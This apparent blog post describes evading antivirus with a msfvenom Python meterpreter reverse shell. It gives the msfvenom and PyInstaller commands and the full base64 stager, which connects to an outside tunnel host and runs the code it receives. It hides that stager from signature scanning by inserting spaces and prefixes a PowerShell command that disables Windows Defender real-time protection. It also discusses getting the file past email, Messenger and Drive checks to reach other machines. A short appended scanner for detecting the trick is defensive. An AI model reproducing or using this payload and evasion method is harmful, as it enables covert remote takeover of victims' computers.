This is a secret that I have to share with the public, for educational purposes and for antivirus companies to take into consideration. All of my reverse shell experiments required me to disable my firewall and antivirus so that they would yield results, because they were only meant to prove that the software and methods work, and so far I have succeeded. But I realized that this is still incomplete. I mentioned in my previous post that a crypter like Shellter may be used to avoid antivirus detection, so I tried it, but the encrypted payload was detected by Windows Defender because Shellter is no longer being updated by its creators. I have not tried Veil as a crypter, but through my endless research it appears to be in the same situation as Shellter. I wanted to do something better to avoid antivirus detection. The crypter I tried failed, so I decided to use an obfuscation method, and I am happy to announce that with the latest update of Windows Defender, it was not able to detect the payload I created with msfvenom (tweaked a little bit). This was my own experiment only.
Windows Defender looks for hashes inside a file that match its database of known threats, so what if I had access to those hashes and modified them a little bit, restoring them only at runtime? So I researched whether the msfvenom payload can be output as a Python script, and it can, by issuing the following command:
```shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o payload.py
```
It created the following Python script:
```python
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3YzdmNTU0ODExMGU3LmxocnR1bm5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=')[0]))
```
This is a complete Python script and can already be executed. The payload is the long encrypted word, where I suspect the hash is located. So I used PyInstaller to convert it to an executable file by typing the following:
```shell
pyinstaller --noconsole --onefile payload.py --nowindowed
```
Then I uploaded it to Google Drive. I could not send it via email (Yahoo and Gmail) because they detect it as a harmful file, and these email services do not allow .exe files even if the file has no virus. I also tried Facebook Messenger, and it also did not allow the file to be sent because it detected malicious content. I tried changing the extension from .exe to .zip and sending it through Facebook Messenger, and I was surprised that it succeeded. But this is very impractical, because you cannot instruct your friend to change it back to .exe; it will still be detected by Windows Defender after conversion. So I succeeded in uploading the file to my Google Drive. I tried to download it to my other PC, but that was when Google detected that it was a virus. It still gave me the option to download it, so I obviously continued, but when it reached 90%, Windows Defender stopped the download because it was a virus.
So basically I could not download the payload.
As stated in the second paragraph, I needed to tweak the Python script. I took out the encrypted word and assigned it to a variable. I made a small change to the encrypted word by inserting several spaces at random positions. The second command removes the spaces; then I compiled it using PyInstaller, uploaded it to Google Drive, and downloaded it, and I succeeded in downloading the payload without it being detected by Windows Defender or Google.
Here is the complete Python script:
```python
import subprocess

def run(self, cmd):
    completed = subprocess.run(["powershell", "-Command", cmd], capture_output=True)
    return completed

if __name__ == '__main__':
    hello_command = "Set-MpPreference -DisableRealtimeMonitoring $true"
    #hello_info = run(hello_command)
    subprocess.run(["powershell", "-Command", hello_command], capture_output=True)
    codel = ' aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbi ByYW5nZSgxMCk6Cgl0cnk6CgkJ cz1zb2NrZXQuc29ja2V0KDIsc2 9ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3Yz dmNTU0ODExMGU3LmxocnR1b m5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNl cHQ6CgkJdGltZS5zbGVlcCg1KQpsPX N0cnVjdC51bnBhY2soJz5JJyxzLnJlY3 YoNCkpWzBdCmQ9cy5yZWN2K GwpCndoaWxlIGxlbihkKTxsOgoJ ZCs9cy5yZWN2KGwtbGVuKGQpKQ pleGVjKHpsaWIuZGVjb21wcmVzcy hiYXNlNjQuYjY0ZGVjb2RlKGQp KSx7J3MnOnN9KQo='
    codel.replace(" ","")
    exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(codel)[0]))
```
As an added bonus, I added a feature that disables Windows Defender real-time protection before executing the payload. I was planning to disable the firewall as well, but as of this writing I have not implemented it yet, because I was too excited to document what I had just achieved.
My experiment so far is based on the antivirus software that came pre-installed on my PC; I think it is bundled with any licensed Windows OS. As part of my testing phase, I uploaded the Python script to virustotal.com to test whether other antivirus products could detect it. AVG and Avast were able to detect it. I thought the spaces I had added were not enough, so I added some more and uploaded it again to virustotal.com, and finally it came out as virus free.
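A scanner that undoes the space-insertion trick before matching, written here as an added example from the detection side (it is not code from the post): it strips whitespace out of every base64-looking run, decodes the run, and looks for the stager's receive-then-exec lines and for the Set-MpPreference call in the wrapper. The sample input is constructed inline from two signature lines only, not from a working payload, and the marker strings are assumptions drawn from the decoded script shown above.

```python
import base64
import re

# Markers for the two parts the post describes: the wrapper that calls
# Set-MpPreference, and the decoded msfvenom python stager (assumed marker strings).
WRAPPER_MARKERS = ("Set-MpPreference -DisableRealtimeMonitoring", "getencoder('utf-8')")
DECODED_STAGER_MARKERS = ("struct.unpack('>I',s.recv(4))", "exec(zlib.decompress(base64.b64decode(")

# A base64 alphabet run, 40+ chars once joined, allowing whitespace between any two chars.
B64_RUN = re.compile(r"(?:[A-Za-z0-9+/=]\s*){40,}")


def decode_candidates(text):
    """Strip whitespace out of every base64-looking run and try to decode it."""
    decoded = []
    for match in B64_RUN.finditer(text):
        run = re.sub(r"\s+", "", match.group(0))
        run += "=" * (-len(run) % 4)  # repair padding lost to hand editing
        try:
            decoded.append(base64.b64decode(run).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def scan(text):
    """Sorted markers found in the raw text or inside any decoded base64 run."""
    hits = {m for m in WRAPPER_MARKERS if m in text}
    for blob in decode_candidates(text):
        hits.update(m for m in DECODED_STAGER_MARKERS if m in blob)
    return sorted(hits)


# Constructed sample: just the two signature lines of the stager (not a working
# payload), base64-encoded, then a space inserted every 7 characters, placed in
# the same wrapper shape the post shows.
_SIGNATURE_LINES = (
    "l=struct.unpack('>I',s.recv(4))[0]\n"
    "exec(zlib.decompress(base64.b64decode(d)),{'s':s})\n"
)
_B64 = base64.b64encode(_SIGNATURE_LINES.encode()).decode()
SAMPLE_SCRIPT = (
    "subprocess.run(['powershell', '-Command', "
    "'Set-MpPreference -DisableRealtimeMonitoring $true'])\n"
    "codel = '" + " ".join(_B64[i:i + 7] for i in range(0, len(_B64), 7)) + "'\n"
    "exec(__import__('base64').b64decode("
    "__import__('codecs').getencoder('utf-8')(codel)[0]))\n"
)

if __name__ == "__main__":
    print(scan(SAMPLE_SCRIPT))
```

The raw file never contains the stager's signature lines, which is why a scanner that only string-matches the file on disk misses it; normalizing and decoding every base64 run first makes the inserted spaces irrelevant.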
To be continued...